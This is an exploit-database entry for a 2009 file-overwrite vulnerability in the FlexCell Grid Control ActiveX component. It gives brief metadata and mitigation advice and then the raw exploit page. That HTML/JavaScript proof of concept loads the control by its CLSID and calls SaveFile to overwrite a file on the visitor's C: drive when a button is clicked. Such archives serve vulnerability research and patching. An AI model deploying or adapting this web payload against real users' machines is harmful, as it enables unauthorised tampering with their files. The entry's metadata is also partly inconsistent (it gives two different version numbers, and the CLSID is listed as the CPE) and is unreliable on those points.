FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit

vendor:

Grid Control

by:

Houssamix

9.3

CVSS

HIGH

Remote File Overwrite

264

CWE

Product Name: Grid Control

Affected Version From: 5.6.2009

Affected Version To: 5.6.2009

Patch Exists: Yes

Related CWE: N/A

CPE: 2A7D9CCE-211A-4654-9449-718F71ED9644

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit

The ExportToXML() function of FlexCell Grid Control 5.6.9 is vulnerable to a remote file overwrite exploit. An attacker can use the SaveFile() function to overwrite a file on the target system.

Mitigation:

Update to the latest version of FlexCell Grid Control.

Source

Exploit-DB raw data:

<HTML>
<BODY>

<b>   
	Author : Houssamix    <br/>  <br/>  <br/>

	FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit  <br/>
	
	ExportToXML() is vuln to <br/>

<b/>


<object id=hsmx classid="clsid:{2A7D9CCE-211A-4654-9449-718F71ED9644}"></object>

<SCRIPT>
/*
Report for Clsid: {2A7D9CCE-211A-4654-9449-718F71ED9644}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data  
*/
function hehe()
 {
     File = "c:\\hsmx.txt"
   hsmx.SaveFile(File)
 }

</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>

# milw0rm.com [2009-01-26]